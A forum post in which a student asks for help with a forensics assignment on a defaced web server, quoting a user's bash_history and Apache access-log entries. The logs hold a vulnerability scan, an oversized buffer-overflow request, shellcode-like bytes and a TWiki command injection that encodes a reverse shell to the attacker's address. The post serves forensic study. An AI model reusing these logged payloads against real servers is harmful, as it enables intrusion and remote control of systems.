Hey guys!
Let me start by saying it’s a school assignment, and therefore not a real world situation. Nevertheless, I would appreciate any help I can get.
The company ProvidIT has contacted us: their website has been hacked. Instead of their normal website, it shows “Buy credit card details online, click here” (cc4u.jpg). A classic defacement.
The following offences might also have been committed, so it’s our job to find evidence for those offences.
(I had to translate the Dutch law articles, so they might not be 100% accurate legally speaking, but you get the idea)
- Unlawfully accessing automated systems
- Copy or tap (eavesdrop) data after hacking
- Unlawfully access or use system resources of a 3rd party computer
- Deliberate access or impede the use of automated work by sending data (spam)
- Tapping or recording ‘data’
- Placing of recording equipment
- Be in possession of equipment capable of tapping
- Publishing eavesdropped data
- Create a malfunction in automated systems on purpose
- On purpose altering data or making data unusable after hacking
- Being responsible for altering data or making data unusable
We already found a lot of evidence. The problem with the evidence right now: it’s all circumstantial. We can’t connect it to a conclusion of fact yet. The evidence is supposed to be used in a lawsuit, in which a hacker should get convicted for the facts mentioned above. Therefore, the evidence needs to be there and preferably be irrefutable.
I’m going to provide you with a summary of the things we have found, and what it could mean.
Since I’ve kinda exhausted my knowledge here, I need some help. What I’d like from you is to tell me where to look for more evidence. Are there more log files I don’t know about, are there more system locations we need to investigate?
We’re using the CAINE Live CD and Autopsy to investigate the hacked server.
Thanks very much in advance.
-----------
NOTABLE CHANGES / FILES
We found both a passwd and a passwd-, and a shadow and shadow-.
The passwd and shadow (without hyphen) have a user added (cees) when compared to the files with hyphens.
/var/www -> index.html deleted 15-04-2010 (changed 9.57.51)
/var/www/user/index.html -> defaced with cc4u
cc4u.jpg
cc4u.com site (URL)
/var/www/user/leo/.bash_history
CONTENTS OF THIS BASH_HISTORY:
Code:
ls
ls -la
cd ..
cd /etcd /etc
cd /etc
ls
nano passwd
cp leo@ServerGroep1/etc/passwd /passwd.back
cp leo@ServerGroep1:/etc/passwd /passwd.back
scp leo@ServerGroep1:/etc/passwd /passwd.back
nano passwd
nano shadow
logout
ls
cp cc4u.jpg /var/www/user/cc4u.jpg
cp index.html /var/www/user/index.html
cd ..
ls
cp index.html /arno/index.html
cd arno
ls -la
touch test
ls -la
rm test
cd ..
cp index.html /arno/index.html
cp index.html arno/index.html
cp cc4u.jpg arno/cc4u.jpg
ls -l
cp cc4u.jpg cees/cc4u.jpg
cp cc4u.jpg ed/cc4u.jpg
cp cc4u.jpg ellen/cc4u.jpg
cp cc4u.jpg peter/cc4u.jpg
cp cc4u.jpg tim/cc4u.jpg
cp cc4u.jpg tom/cc4u.jpg
cp cc4u.jpg ton/cc4u.jpg
cp cc4u.jpg vincent/cc4u.jpg
cp index.html arno/index.html
cp index.html cees/index.html
cp index.html ed/index.html
cp index.html ellen/index.html
cp index.html peter/index.html
cp index.html tim/index.html
cp index.html ton/index.html
cp index.html vincent/index.html
cd ..
logout
Question remaining: which user did this? He’s already in the system at this point.
LOGFILES
/var/log/apache2/access.log
Several attempts to find errors on the website, execute path traversal, etc.
Code:
10.13.37.10 - - [12/Apr/2010:11:31:43 +0200] "GET / HTTP/1.1" 200 5518 "-" "w3af.sourceforge.net"
W3af => web application attack and audit framework to find and exploit web application vulnerabilities
http 400 = bad request
http 200 = successful
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "OPTIONS / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "QWERTY / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "OPTIONS / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "TRACE / HTTP/1.0" 200 54 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "GET / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "HEAD / HTTP/1.0" 200 - "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "DELETE / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "PUT / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:31 +0200] "POST / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "COPY / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "MOVE / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "MKCOL / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "PROPFIND / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "PROPPATCH / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "LOCK / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "UNLOCK / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "SEARCH / HTTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET /asdfg.hjkl HTTP/1.0" 404 320 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET" 200 5518 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET /" 200 5518 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/999.99" 400 338 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HHTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTP/1.0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HHTP/999.99" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / hhtp/999.99" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / http/999.99" 400 338 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/Q.9" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/9.Q" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/Q.Q" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.X" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.10" 400 338 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.1.0" 400 338 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.2" 400 338 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/2.1" 400 338 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1,0" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/1.0X" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET / HTTP/" 200 5518 "-" "w3af.sourceforge.net"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1.0" 200 5518 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/ HTTP/1.0" 400 338 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET /HTTP/1.0" 404 318 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP /1.0" 501 325 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1 .0" 400 338 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1. 0" 400 338 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:31:32 +0200] "GET/HTTP/1.0 " 200 5518 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:38:58 +0200] "SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 414 362 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:38:59 +0200] "GET /OvCgi/Main/Snmp.exe HTTP/1.1" 404 329 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:39:00 +0200] "GET /g?\x921\xd0\xd2\xd5/5\x1c#\xd6\x98$\xb2<\x7f\x11\xd3\xe0)\xe1K%=}-3\xf5\xb5\x99\x91\x11\xe1{F\xb1\x87\xf7\xe2\x7ft|\x1d\x1c\x83\xd1\xeb\x1a\xd5?y,\x8c\xe0w%\x13\xfcz/sx(\xd6\x96pH\x88\xd4\x15\xb4\x8d\xb6\xb9JF4uGO\xb3<\x98\xb8=\x92\x19\xe3Nv7\x14*\xf9\xbe\x81\xfdf\xba9\xf5\xb7qB5\x9fg\x04'CI~$\xb0\xbf\x972\xd0\xf8\x05\x99\x90}@rA\x9b\xbb\x93\xb2\xb5K\xa9\x91-\xa8\x89\xe1~5{,\xba\xb7f$'J\"\xe0%\x9b\xb4vN\x1c\xb0rF@\x9f\xa9\x03\xfd\x15Ksuy/\x99i\xf8\x91\x93+\xf9}#\xf5\xb1q|-\x04\x86\xd4\x12\xf6\xe2\x7fI\x90xB<\x96\x97\xb5tz\x05\xb9\x01\xe3gwp?\x80\xebG\x1d\xbb8\xd5A7C\x92\xbek\xfc\xb64\xb8\x85\xff\xc1\xd2\xd6\xbf\xb3=HO\x14\x98\x8d\xb2\xa8~u5g\x04\x02\xe21\xfe\xc6\xc7\xc0\xf8\x7fq\x1cH\xb1s'\xa90\xd4\x84\xf94\x1b\xfdf\b\xe1x@G\x91!\xd6r\x10\xf5/\xa8\x92B\xb6\x05\xb5yJ|C%\x97?\x90z:\xfc\x937O;\xe3-\x18\xd5\x9f\x8d\xba\xb7I\x98<\x15\xb0\xbf{$\x96pA\xb8\xb4\x87\xd1\xebwK\xbe)\xe0F\xb2\xb9\x99t}\x14\xbbv=,|{q\x1d\x89\xeb9\xc1\xe1N\x9b\xb3\x9b\xb7\xb3\x1a\xf5\b\xe2A\x02\xe0s\x15NB\xb9g\xbe\x91\x9f\xbb\xb8\x1dy'\x11\xe3x\x7f/3\xfd?\x98\xb2\x93\x8d\x97vOH\xb5r5f\x1b\xd5\x92\xb6\x04F\x18\xf8G\x85\xd3\xd6\xb4\xbf\xb0C,K\x90\x8c\xc0\xfc\xb14wp\x05\x96$J;\xf9\xba<\x14}Iu%\x1c7tz=\xa9+\xd4@-\x99\xa8~f\x81\xe3*\xe0\x14{t7xwrz#\xfcB~=|\x15\x03\xf7\xe1qk\xd5\xa9\xbb\xb9JpA\x99\x12\xd4\xb3\x96sF?\xb5\x9b\xa8vG\x04\xb0g\xbe}<\x938\xd0\xf9C\x10\xeby!\xe2'\xbf\xb7\x8d\xb1H\x7f2\xf8%,\x9fKOu54\xb2\x88\xe3\x01\xe1$\xba\x92y:\xe2i\xf5r\"\xeb-w\x1c\xb8\xb4~1\xe0Nt(\xfds/\x98u\x05\x90v\x1d}0\xd6{I|@\xb6\x91\x97\x83\xf6\xd2\xfc\x97\x7f-\xb4f/z\x1d\x8d\x93\xb7\xbf\x19\xf9\x96\x98\xb9\xb5K\x15\x9b<p%\x1cNg\x13\xd65AF\x14G\x84\xfdC?\x99\xbe\x80\xf8,Oq\x04\xbb\xba\xb6=\x9f\x90\xb14\x92\xb2x\x05@$H\xd47\xb8\xf5\x86\xd5\x91I\xa9\xa8\xb0'\xb3JB3\xc9\xb1K\xdb\xcd\xd9t$\xf4\xbf\xd8n\xcf\xbb[\x83\xeb\xfc1{\x0f\x03\xa3a-N\xd2\xba\xe5C+\xbd\xfaLZB\x03\x8d<\xca\xe6\xbcn\xa8c\xec\xbe\xba&\x1d5\xee\xd2\x96;'\xd4\x1f\xf1\x11\xdb\xa04\x9e\xb7cWb\xca\xb7\xb7[\
x05\xca\xb6\x9cx%\xeau\xf6\x94\x1a\xf1J%\x1b\xd5\xc0\x15cP\x16\xe1\xd9[GZV\x13\x7f\xd00\x84~5#\xf8\xc92\x97\x8a\xcb\x92\xe6s\xfa\xda\xa4M2\xd7\xb5\x8a\xf5\b\xc0\xe0\x05\xb4\xd22wbW\xa7\xdf\xe1\xcf\x03\xe1&\x89\xc0\xed\x83\xde\x8f\xf1\x123\xa4\x0e\x9e\xb2k\x87\xe4\x90\xaf\xc3\xbf\xb9\xf6\xa9n\xc6\xe9\x16\xceba\xb4\x1b\x14(\xd1\xe8*\xd3!g=\xa0\x13(\x95.\x18\xa13\xa8_\x98\x83&\x9e#\xf3oew\xa3\x07L\xf8(\xd8q-\xfe\x88\xdd\x9e\xbex\x9eNV\x93\x11\xb0F\x9c\xfb\xd9\xecfl\xec\xfdMf\x98\xff\x8d\xe3Nvka\x7f\xde#\x1e\xe6{\xbf\xbf\xe7V\xc5\x80lT9N\x85\x11)'el\x13\xeez[>\x0f\xefg\xe9X\x87e\xcc\xaf\b\x96;\xa4\x81\x02\x84\xd3\xed\xc2\x04$\xb8\x88\x04L\x1c\xe8Vic%\xcb\"\xf6\xc5\xba\x97Q\xad@\xc1\x96r\xba$'Om\x01\xad\xb9\x1bam\xaf\xa3\xbbw\xa9\xfd\x9fB\xb7\xb6\xa8G\xe9\x1c\xfc\xff\xff HTTP/1.1" 404 311 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:39:00 +0200] "GET /twiki/bin/view/Main/WebSearch?search=gWSkE5%27%3b/bin/echo%24%7bIFS%7d-ne%24%7bIFS%7d%27\\x30\\x3c\\x26\\x32\\x31\\x33\\x2d\\x3b\\x65\\x78\\x65\\x63\\x20\\x32\\x31\\x33\\x3c\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x74\\x63\\x70\\x2f\\x31\\x30\\x2e\\x31\\x33\\x2e\\x33\\x37\\x2e\\x31\\x30\\x2f\\x33\\x32\\x33\\x33\\x33\\x3b\\x73\\x68\\x20\\x3c\\x26\\x32\\x31\\x33\\x20\\x3e\\x26\\x32\\x31\\x33\\x20\\x32\\x3e\\x26\\x32\\x31\\x33%27%7csh%3b%23%27 HTTP/1.1" 404 339 "-" "-"
10.13.37.10 - - [12/Apr/2010:11:39:00 +0200] "POST /nagios3/cgi-bin/statuswml.cgi HTTP/1.1" 404 339 "-" "-"
